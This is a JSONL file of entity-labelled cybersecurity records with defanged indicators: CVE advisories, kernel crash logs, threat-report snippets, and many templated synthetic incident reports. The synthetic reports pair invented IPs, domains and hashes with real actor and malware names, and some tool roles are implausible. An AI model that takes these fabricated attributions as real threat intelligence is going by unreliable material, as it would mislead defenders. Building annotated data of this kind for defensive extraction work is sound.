{"text": "FireEye published a threat intelligence report linking Star Blizzard to a new campaign exploiting CVE-2026-39735 in Ivanti Connect Secure. The attackers deployed Cobalt Strike via Metasploit, establishing C2 communication with 157[.]139[.]171[.]70 and relaydata[ . ]club. A secondary payload was downloaded from hxxp://node-storage[ . ]top/secure/token. The malware binary (SHA1: 9cb9e81bedfc446f25943dfde8fc85a1e1870f9e) was dropped to C:\\Windows\\Temp\\svchost.exe. Phishing emails were sent from info@phishing-domain[.]com targeting enterprise users. A backup C2 server was identified at 206 [ . ] 50 [ . ] 130 [ . ] 168.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2026-39735": [[98, 112]], "System: Ivanti Connect Secure": [[116, 137]], "Malware: Cobalt Strike": [[162, 175]], "Indicator: 157.139.171.70": [[227, 247]], "Indicator: relaydata.club": [[252, 270]], "Indicator: hxxp://node-storage.top/secure/token": [[312, 352]], "Indicator: 9cb9e81bedfc446f25943dfde8fc85a1e1870f9e": [[380, 420]], "Indicator: info@phishing-domain.com": [[497, 523]], "Indicator: 206.50.130.168": [[589, 621]]}, "info": {"id": "synth_v2_00217", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 52[.]3[.]73[.]115, the Tenable IR team identified BatLoader running as C:\\Windows\\Tasks\\csrss.exe. The threat actor, believed to be Forest Blizzard, used PowerView for credential harvesting and Brute Ratel for lateral movement. Exfiltrated data was sent to relayrelay[ . ]cc and api-backup[ . ]top. The initial dropper (SHA1: 0fc771507060e2d96e9cf73b4b39f48bba21660e) was delivered via a phishing email from security@identity-verify[ . ]cc. A second C2 node was observed at 172 [ . ] 126 [ . ] 168 [ . ] 234, with a persistence mechanism writing to /home/user/.config/lsass.dmp.", "spans": {"Indicator: 52.3.73.115": [[64, 81]], "Organization: Tenable": [[87, 94]], "Malware: BatLoader": [[114, 123]], "Indicator: relayrelay.cc": [[321, 338]], "Indicator: api-backup.top": [[343, 361]], "Indicator: 0fc771507060e2d96e9cf73b4b39f48bba21660e": [[390, 430]], "Indicator: security@identity-verify.cc": [[472, 503]], "Indicator: 172.126.168.234": [[538, 571]]}, "info": {"id": "synth_v2_00312", "source": "defanged_augment"}}
{"text": "The second file , happiness[.]txt , contains custom code in binary format that is encrypted and used by xxxx[.]exe .", "spans": {"Indicator: happiness.txt": [[18, 33]], "Indicator: xxxx.exe": [[104, 114]]}, "info": {"id": "cyberner_stix_train_002379", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"f2fs: fix to do sanity check on extent cache correctly\"\n\nsyzbot reports a f2fs bug as below:\n\nUBSAN: array-index-out-of-bounds in fs/f2fs/f2fs.h:3275:19\nindex 1409 is out of range for type '__le32[923]' (aka 'unsigned int[923]')\nCall Trace:\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106\n ubsan_epilogue lib/ubsan.c:217 [inline]\n __ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348\n inline_data_addr fs/f2fs/f2fs.h:3275 [inline]\n __recover_inline_status fs/f2fs/inode.c:113 [inline]\n do_read_inode fs/f2fs/inode.c:480 [inline]\n f2fs_iget+0x4730/0x48b0 fs/f2fs/inode.c:604\n f2fs_fill_super+0x640e/0x80c0 fs/f2fs/super.c:4601\n mount_bdev+0x276/0x3b0 fs/super.c:1391\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n do_new_mount+0x28f/0xae0 fs/namespace.c:3335\n do_mount fs/namespace.c:3675 [inline]\n __do_sys_mount fs/namespace.c:3884 [inline]\n __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe issue was bisected to:\n\ncommit d48a7b3a72f121655d95b5157c32c7d555e44c05\nAuthor: Chao Yu <chao@kernel[ . ]org>\nDate:   Mon Jan 9 03:49:20 2023 +0000\n\n    f2fs: fix to do sanity check on extent cache correctly\n\nThe root cause is we applied both v1 and v2 of the patch, v2 is the right\nfix, so it needs to revert v1 in order to fix reported issue.\n\nv1:\ncommit d48a7b3a72f1 (\"f2fs: fix to do sanity check on extent cache correctly\")\nhxxps://lore[ . ]kernel[ . ]org/lkml/20230109034920.492914-1-chao@kernel.org/\n\nv2:\ncommit 269d11948100 (\"f2fs: fix to do sanity check on extent cache correctly\")\nhxxps://lore[ . ]kernel[ . ]org/lkml/20230207134808.1827869-1-chao@kernel.org/", "spans": {"Indicator: https://lore.kernel.org/lkml/20230109034920.492914-1-chao@kernel.org/": [[1638, 1715]], "Indicator: https://lore.kernel.org/lkml/20230207134808.1827869-1-chao@kernel.org/": [[1800, 1878]], "Indicator: kernel.org": [[1303, 1317]], "Indicator: d48a7b3a72f121655d95b5157c32c7d555e44c05": [[1240, 1280]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53763"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 131 [ . ] 250 [ . ] 188 [ . ] 179, the Europol IR team identified Hive running as C:\\Windows\\Tasks\\payload.bin. The threat actor, believed to be Velvet Tempest, used Sliver for credential harvesting and Nmap for lateral movement. Exfiltrated data was sent to data-proxy[.]com and updatelogin[.]info. The initial dropper (SHA1: c66d489e31b1c9f455df0990349890f8ccd5a4f9) was delivered via a phishing email from security@phishing-domain[.]com. A second C2 node was observed at 192 [ . ] 197 [ . ] 217 [ . ] 189, with a persistence mechanism writing to /usr/local/bin/helper.sh.", "spans": {"Indicator: 131.250.188.179": [[64, 97]], "Organization: Europol": [[103, 110]], "Malware: Hive": [[130, 134]], "Indicator: data-proxy.com": [[323, 339]], "Indicator: updatelogin.info": [[344, 362]], "Indicator: c66d489e31b1c9f455df0990349890f8ccd5a4f9": [[391, 431]], "Indicator: security@phishing-domain.com": [[473, 503]], "Indicator: 192.197.217.189": [[538, 571]]}, "info": {"id": "synth_v2_00324", "source": "defanged_augment"}}
{"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 3[ . ]doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"Organization: organizations": [[209, 222]], "Organization: financial services": [[230, 248]], "Organization: telecoms": [[251, 259]], "Organization: government": [[262, 272]], "Organization: defense sectors": [[279, 294]], "Indicator: 3.doc": [[297, 306]], "Indicator: d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48": [[309, 373]], "Vulnerability: CVE-2022 - 41080": [[389, 405]], "Vulnerability: CVE-2022 - 41040": [[480, 496]]}, "info": {"id": "cyberner_stix_train_005185", "source": "defanged_augment"}}
{"text": "Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5 [ . ] 5 [ . ] 0 [ . ] 0.0, 11 [ . ] 1 [ . ] 1 [ . ] 9.0, 12 [ . ] 2 [ . ] 1 [ . ] 3.0 and 12[.]2[.]1[.]4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).", "spans": {"Indicator: 5.5.0.0": [[148, 173]], "Indicator: 11.1.1.9": [[177, 203]], "Indicator: 12.2.1.3": [[207, 233]], "Indicator: 12.2.1.4": [[240, 254]], "Organization: Oracle": [[45, 51]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14880"}}
{"text": "The malicious apps can steal personally identifiable and financial data and install additional apps . First attack of this campaign took place in May 2018 . The “ wprgxyeqd79[ . ]exe ” sample actually is a Self Extracting Archive ( SFX S-TOOL/SFA ) containing four files designed to be extracted in the %TEMP% folder .", "spans": {"Indicator: wprgxyeqd79.exe": [[163, 182]]}, "info": {"id": "cyberner_stix_train_001546", "source": "defanged_augment"}}
{"text": "go-merkledag implements the 'DAGService' interface and adds two ipld node types, Protobuf and Raw for the ipfs project. A `ProtoNode` may be modified in such a way as to cause various encode errors which will trigger a panic on common method calls that don't allow for error returns. A `ProtoNode` should only be able to encode to valid DAG-PB, attempting to encode invalid DAG-PB forms will result in an error from the codec. Manipulation of an existing (newly created or decoded) `ProtoNode` using the modifier methods did not account for certain states that would place the `ProtoNode` into an unencodeable form. Due to conformance with the [`github[.]com/ipfs/go-block-format#Block`](hxxps://pkg[.]go[.]dev/github.com/ipfs/go-block-format#Block) and [`github[ . ]com/ipfs/go-ipld-format#Node`](hxxps://pkg[.]go[.]dev/github.com/ipfs/go-ipld-format#Node) interfaces, certain methods, which internally require a re-encode if state has changed, will panic due to the inability to return an error. This issue has been addressed across a number of pull requests. Users are advised to upgrade to version 0.8.1 for a complete set of fixes. Users unable to upgrade may attempt to mitigate this issue by sanitising inputs when allowing user-input to set a new `CidBuilder` on a `ProtoNode` and by sanitising `Tsize` (`Link#Size`) values such that they are a reasonable byte-size for sub-DAGs where derived from user-input.", "spans": {"Indicator: https://pkg.go.dev/github.com/ipfs/go-block-format#Block": [[688, 748]], "Indicator: https://pkg.go.dev/github.com/ipfs/go-ipld-format#Node": [[798, 856]], "Indicator: github.com": [[646, 658], [756, 770]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-23495"}}
{"text": "A separate malicious executable – 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 ( vlc[ . ]exe ) – runs when the photograph is displayed , using the YouTube icon and calling out to several URLs on windowsnewupdates[.]com .", "spans": {"Indicator: 2DE25306A58D8A5B6CBE8D5E2FC5F3C5": [[34, 66]], "Indicator: vlc.exe": [[69, 80]], "Indicator: windowsnewupdates.com": [[183, 206]]}, "info": {"id": "cyberner_stix_train_002917", "source": "defanged_augment"}}
{"text": "Tuleap is an open source suite to improve management of software developments and collaboration. In Tuleap Community Edition prior to version 14 [ . ] 11 [ . ] 99 [ . ] 28 and Tuleap Enterprise Edition prior to versions 14.10-6 and 14.11-3, the preview of an artifact link with a type does not respect the project, tracker and artifact level permissions. The issue occurs on the artifact view (not reproducible on the artifact modal). Users might get access to information they should not have access to. Only the title, status, assigned to and last update date fields as defined by the semantics are impacted. If those fields have strict permissions (e.g. the title is only visible to a specific user group) those permissions are still enforced. Tuleap Community Edition 14[.]11[.]99[.]28, Tuleap Enterprise Edition 14.10-6, and Tuleap Enterprise Edition 14.11-3 contain a fix for this issue.", "spans": {"Indicator: 14.11.99.28": [[142, 171], [772, 789]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-38508"}}
{"text": "SentinelOne published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2020-48698 in Cisco ASA. The attackers deployed REvil via Metasploit, establishing C2 communication with 198 [ . ] 24 [ . ] 24 [ . ] 170 and gateway-relay[.]site. A secondary payload was downloaded from hxxp://edge-sync[ . ]online/wp-content/uploads/doc.php. The malware binary (SHA1: 52a81f85578ec25909f93977c451790e2c34748a) was dropped to C:\\Windows\\Temp\\agent.py. Phishing emails were sent from contact@secure-verify[ . ]net targeting enterprise users. A backup C2 server was identified at 192 [ . ] 10 [ . ] 24 [ . ] 177.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2020-48698": [[104, 118]], "System: Cisco ASA": [[122, 131]], "Malware: REvil": [[156, 161]], "Indicator: 198.24.24.170": [[213, 244]], "Indicator: gateway-relay.site": [[249, 269]], "Indicator: hxxp://edge-sync.online/wp-content/uploads/doc.php": [[311, 365]], "Indicator: 52a81f85578ec25909f93977c451790e2c34748a": [[393, 433]], "Indicator: contact@secure-verify.net": [[507, 536]], "Indicator: 192.10.24.177": [[602, 633]]}, "info": {"id": "synth_v2_00134", "source": "defanged_augment"}}
{"text": "Incident Report: Gamaredon compromised the network via initial access from 213 [ . ] 199 [ . ] 124 [ . ] 120. The threat actor deployed BloodHound and exfiltrated data to token-auth[[.]]space. Lateral movement was observed to 196[.]212[.]188[.]152. A dropper with MD5 hash 276a463eb76edb23baa19d5eaeb35a65 was found at C:\\Windows\\System32\\config\\SAM. The exfiltration endpoint micro-update[[.]]net was registered 48 hours before the attack.", "spans": {"Indicator: 213.199.124.120": [[75, 108]], "Indicator: token-auth[.]space": [[171, 191]], "Indicator: 196.212.188.152": [[226, 247]], "Indicator: 276a463eb76edb23baa19d5eaeb35a65": [[273, 305]], "Indicator: micro-update[.]net": [[377, 397]]}, "info": {"id": "synth_00092", "source": "defanged_augment"}}
{"text": "Volexity published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2022-25256 in Barracuda ESG. The attackers deployed Ryuk via Metasploit, establishing C2 communication with 49[.]98[.]127[.]146 and relaygateway[.]dev. A secondary payload was downloaded from hxxp://secure-secure[.]io/panel/index.html. The malware binary (MD5: 29d94d26f2667bca2cd4e0a9ec2c3a94) was dropped to C:\\Users\\admin\\Downloads\\dropper.ps1. Phishing emails were sent from report@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 192[.]212[.]54[.]197.", "spans": {"Organization: Volexity": [[0, 8]], "Vulnerability: CVE-2022-25256": [[101, 115]], "System: Barracuda ESG": [[119, 132]], "Malware: Ryuk": [[157, 161]], "Indicator: 49.98.127.146": [[213, 232]], "Indicator: relaygateway.dev": [[237, 255]], "Indicator: http://secure-secure.io/panel/index.html": [[297, 339]], "Indicator: 29d94d26f2667bca2cd4e0a9ec2c3a94": [[366, 398]], "Indicator: report@credential-check.site": [[484, 514]], "Indicator: 192.212.54.197": [[580, 600]]}, "info": {"id": "synth_v2_00183", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10[.]3[.]6[.]0.0 and 12 [ . ] 1 [ . ] 3 [ . ] 0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 10.3.6.0": [[155, 169]], "Indicator: 12.1.3.0": [[176, 202]], "Organization: Oracle": [[21, 27], [55, 61], [314, 320], [455, 461], [644, 650], [734, 740]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2552"}}
{"text": "IOC Bulletin - Dridex Campaign:\nNetwork Indicators:\n- 74[.]182[.]72[.]152\n- 79[.]180[.]236[.]80\n- 53[.]109[.]35[.]153\n- authauth[ . ]top\n- datadata[ . ]live\nURLs:\n- hxxp://securestatic[ . ]site/login\n- hxxp://update-cdn[.]club/admin/config\nEmail Senders:\n- finance@login-portal[ . ]tech\n- finance@mail-service[.]info\nFile Indicators:\n- SHA256: 085dadd662b2f8760e0932d7603454ba76f42575405585325038801141c4e708\n- MD5: 73472187b07ff9f4e69561e0b907e3e0\n- Drop path: /dev/shm/csrss.exe", "spans": {"Malware: Dridex": [[15, 21]], "Indicator: 74.182.72.152": [[54, 73]], "Indicator: 79.180.236.80": [[76, 95]], "Indicator: 53.109.35.153": [[98, 117]], "Indicator: authauth.top": [[120, 136]], "Indicator: datadata.live": [[139, 156]], "Indicator: http://securestatic.site/login": [[165, 199]], "Indicator: hxxp://update-cdn.club/admin/config": [[202, 239]], "Indicator: finance@login-portal.tech": [[257, 286]], "Indicator: finance@mail-service.info": [[289, 316]], "Indicator: 085dadd662b2f8760e0932d7603454ba76f42575405585325038801141c4e708": [[344, 408]], "Indicator: 73472187b07ff9f4e69561e0b907e3e0": [[416, 448]]}, "info": {"id": "synth_v2_01337", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: SmokeLoader (SHA1: c08e0c725714bf8570a291a2c66071fdbc6cb980). Upon execution on MOVEit Transfer, the sample creates C:\\Users\\Public\\Documents\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 192[.]12[.]224[.]124 every 60 seconds and DNS queries to backup-portal[.]live. The second stage was fetched from hxxp://mail-portal[.]club/callback and written to C:\\Windows\\System32\\backdoor.elf. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (SHA1: 4787461f448bbb60dcee1fe14136b6391be77f79) was extracted from the unpacked payload.", "spans": {"Malware: SmokeLoader": [[25, 36]], "Indicator: c08e0c725714bf8570a291a2c66071fdbc6cb980": [[44, 84]], "System: MOVEit Transfer": [[105, 120]], "Indicator: 192.12.224.124": [[255, 275]], "Indicator: backup-portal.live": [[312, 332]], "Indicator: http://mail-portal.club/callback": [[368, 402]], "Indicator: 4787461f448bbb60dcee1fe14136b6391be77f79": [[540, 580]]}, "info": {"id": "synth_v2_00473", "source": "defanged_augment"}}
{"text": "Europol detected a multi-stage attack chain. The initial phishing email from finance@credential-check[ . ]site contained a link to hxxps://proxyportal[.]link/api/v2/auth. This redirected to hxxp://backuplogin[ . ]club/api/v2/auth on cdn-login[.]top. A secondary email from billing@auth-check[ . ]org pointed to hxxps://backupstorage[ . ]xyz/portal/verify which delivered BlackCat. The final payload callback was hxxps://cachemail[ . ]tech/panel/index.html resolving to 66[.]69[.]229[.]177 via gateway-cache[ . ]tech.", "spans": {"Organization: Europol": [[0, 7]], "Indicator: finance@credential-check.site": [[77, 110]], "Indicator: https://proxyportal.link/api/v2/auth": [[131, 169]], "Indicator: http://backuplogin.club/api/v2/auth": [[190, 229]], "Indicator: cdn-login.top": [[233, 248]], "Indicator: billing@auth-check.org": [[273, 299]], "Indicator: hxxps://backupstorage.xyz/portal/verify": [[311, 354]], "Malware: BlackCat": [[371, 379]], "Indicator: hxxps://cachemail.tech/panel/index.html": [[412, 455]], "Indicator: 66.69.229.177": [[469, 488]], "Indicator: gateway-cache.tech": [[493, 515]]}, "info": {"id": "synth_v2_01716", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor/W32.Optix.340187 Backdoor.Win32.Optix!O Trojan.Madtol.C Backdoor.Optix Packer.W32.NSAnti.kZ85 Backdoor/Optix.f W32/OptixPro.I Backdoor.OptixPro.13 Win32/OptixPro.F BKDR_OPTIXPRO.H Win.Trojan.Optix-5 Backdoor.Win32.Optix.b Trojan.Win32.Optix.bslhnb Backdoor.Win32.Optix_Pro.340203 Trojan.DownLoader.60627 BKDR_OPTIXPRO.H BehavesLike.Win32.Dropper.fc W32/OptixPro.WZQS-7361 Backdoor/Optix.Pro.bd BDS/Optix[.]Pro.13.7 Trojan[Backdoor]/Win32.Optix Backdoor:Win32/Optixpro.T Backdoor.Win32.Optix.b Trojan/Win32.Xema.C66170 Backdoor.Optix Bck/OptixPro.C Win32/Optix[.]Pro.13 Backdoor.Optix.Pro.BD Backdoor.Win32.Optix", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Optix.Pro": [[433, 444], [589, 600]]}, "info": {"id": "cyner2_train_005573", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. Emails originated from confirm@credential-check[ . ]site and noreply@phishing-domain[.]com, spoofing legitimate services. Victims were directed to hxxp://storageportal[.]info/assets/js/payload.js which hosted a credential harvesting page on data-storage[.]live. A secondary link hxxp://backup-update[.]tech/login delivered Play (SHA1: c49c939de808c898cb29e1c1639363cf2d0b31b4). The malware was saved to /dev/shm/ntds.dit and established C2 with 156[.]52[.]133[.]144.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: confirm@credential-check.site": [[106, 139]], "Indicator: noreply@phishing-domain.com": [[144, 173]], "Indicator: hxxp://storageportal.info/assets/js/payload.js": [[230, 278]], "Indicator: data-storage.live": [[324, 343]], "Indicator: hxxp://backup-update.tech/login": [[362, 395]], "Malware: Play": [[406, 410]], "Indicator: c49c939de808c898cb29e1c1639363cf2d0b31b4": [[418, 458]], "Indicator: 156.52.133.144": [[528, 548]]}, "info": {"id": "synth_v2_00981", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`. This is because the implementation(hxxps://github[ . ]com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295) computes a modulo operation without validating that the divisor is not zero. Since `vector_num_elements` is determined based on input shapes(hxxps://github[.]com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544), a user can trigger scenarios where this quantity is 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295": [[242, 386]], "Indicator: https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544": [[529, 671]], "Vulnerability: denial of service": [[130, 147]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29549"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: ignore xattrs past end\n\nOnce inside 'ext4_xattr_inode_dec_ref_all' we should\nignore xattrs entries past the 'end' entry.\n\nThis fixes the following KASAN reported issue:\n\n==================================================================\nBUG: KASAN: slab-use-after-free in ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\nRead of size 4 at addr ffff888012c120c4 by task repro/2065\n\nCPU: 1 UID: 0 PID: 2065 Comm: repro Not tainted 6.13.0-rc2+ #11\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]16[.]3-0-ga6ed6b701f0a-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n <TASK>\n dump_stack_lvl+0x1fd/0x300\n ? tcp_gro_dev_warn+0x260/0x260\n ? _printk+0xc0/0x100\n ? read_lock_is_recursive+0x10/0x10\n ? irq_work_queue+0x72/0xf0\n ? __virt_addr_valid+0x17b/0x4b0\n print_address_description+0x78/0x390\n print_report+0x107/0x1f0\n ? __virt_addr_valid+0x17b/0x4b0\n ? __virt_addr_valid+0x3ff/0x4b0\n ? __phys_addr+0xb5/0x160\n ? ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\n kasan_report+0xcc/0x100\n ? ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\n ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\n ? ext4_xattr_delete_inode+0xd30/0xd30\n ? __ext4_journal_ensure_credits+0x5f0/0x5f0\n ? __ext4_journal_ensure_credits+0x2b/0x5f0\n ? inode_update_timestamps+0x410/0x410\n ext4_xattr_delete_inode+0xb64/0xd30\n ? ext4_truncate+0xb70/0xdc0\n ? ext4_expand_extra_isize_ea+0x1d20/0x1d20\n ? __ext4_mark_inode_dirty+0x670/0x670\n ? ext4_journal_check_start+0x16f/0x240\n ? ext4_inode_is_fast_symlink+0x2f2/0x3a0\n ext4_evict_inode+0xc8c/0xff0\n ? ext4_inode_is_fast_symlink+0x3a0/0x3a0\n ? do_raw_spin_unlock+0x53/0x8a0\n ? ext4_inode_is_fast_symlink+0x3a0/0x3a0\n evict+0x4ac/0x950\n ? proc_nr_inodes+0x310/0x310\n ? trace_ext4_drop_inode+0xa2/0x220\n ? _raw_spin_unlock+0x1a/0x30\n ? iput+0x4cb/0x7e0\n do_unlinkat+0x495/0x7c0\n ? try_break_deleg+0x120/0x120\n ? 0xffffffff81000000\n ? __check_object_size+0x15a/0x210\n ? strncpy_from_user+0x13e/0x250\n ? getname_flags+0x1dc/0x530\n __x64_sys_unlinkat+0xc8/0xf0\n do_syscall_64+0x65/0x110\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x434ffd\nCode: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 8\nRSP: 002b:00007ffc50fa7b28 EFLAGS: 00000246 ORIG_RAX: 0000000000000107\nRAX: ffffffffffffffda RBX: 00007ffc50fa7e18 RCX: 0000000000434ffd\nRDX: 0000000000000000 RSI: 0000000020000240 RDI: 0000000000000005\nRBP: 00007ffc50fa7be0 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001\nR13: 00007ffc50fa7e08 R14: 00000000004bbf30 R15: 0000000000000001\n </TASK>\n\nThe buggy address belongs to the object at ffff888012c12000\n which belongs to the cache filp of size 360\nThe buggy address is located 196 bytes inside of\n freed 360-byte region [ffff888012c12000, ffff888012c12168)\n\nThe buggy address belongs to the physical page:\npage: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12c12\nhead: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0\nflags: 0x40(head|node=0|zone=0)\npage_type: f5(slab)\nraw: 0000000000000040 ffff888000ad7640 ffffea0000497a00 dead000000000004\nraw: 0000000000000000 0000000000100010 00000001f5000000 0000000000000000\nhead: 0000000000000040 ffff888000ad7640 ffffea0000497a00 dead000000000004\nhead: 0000000000000000 0000000000100010 00000001f5000000 0000000000000000\nhead: 0000000000000001 ffffea00004b0481 ffffffffffffffff 0000000000000000\nhead: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n\nMemory state around the buggy address:\n ffff888012c11f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n ffff888012c12000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n> ffff888012c12080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n                                           ^\n ffff888012c12100: fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc\n ffff888012c12180: fc fc fc fc fc fc fc fc fc\n---truncated---", "spans": {"Indicator: rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org": [[569, 621]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[527, 531]], "Vulnerability: use-after-free": [[329, 343]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-37738"}}
{"text": "A backdoor also known as: W32.Otwyacal.C Win32.Trojan.WisdomEyes.16070401.9500.9748 W32.Wapomi.C!inf Win.Trojan.Vjadtre-6170948-0 Win32.HLLP.Protil.1 BehavesLike[.]Win32[.]Virut[.]ch W32/Jadtre.C Trojan.Symmi.D4E83 Trj/CI.A Win32/Wapomi.Z Virus.Win32.Wapomi.a Exploit.Win32.ShellCode", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.ch": [[150, 182]]}, "info": {"id": "cyner2_train_001038", "source": "defanged_augment"}}
{"text": "TG-3390 : 72[.]11[.]148[.]220 .", "spans": {"Indicator: 72.11.148.220": [[10, 29]]}, "info": {"id": "cyberner_stix_train_004139", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 228 [ . ] 198 [ . ] 122, the NSA IR team identified Ryuk running as /opt/app/bin/sam.hive. The threat actor, believed to be Flax Typhoon, used Chisel for credential harvesting and LaZagne for lateral movement. Exfiltrated data was sent to mailstatic[.]org and gatewayapi[ . ]com. The initial dropper (MD5: 66a4581044f74a34d62f4f5c1344b399) was delivered via a phishing email from account@secure-verify[ . ]net. A second C2 node was observed at 145 [ . ] 216 [ . ] 46 [ . ] 194, with a persistence mechanism writing to /var/tmp/payload.bin.", "spans": {"Indicator: 172.228.198.122": [[64, 97]], "Organization: NSA": [[103, 106]], "Malware: Ryuk": [[126, 130]], "Indicator: mailstatic.org": [[313, 329]], "Indicator: gatewayapi.com": [[334, 352]], "Indicator: 66a4581044f74a34d62f4f5c1344b399": [[380, 412]], "Indicator: account@secure-verify.net": [[454, 483]], "Indicator: 145.216.46.194": [[518, 550]]}, "info": {"id": "synth_v2_00270", "source": "defanged_augment"}}
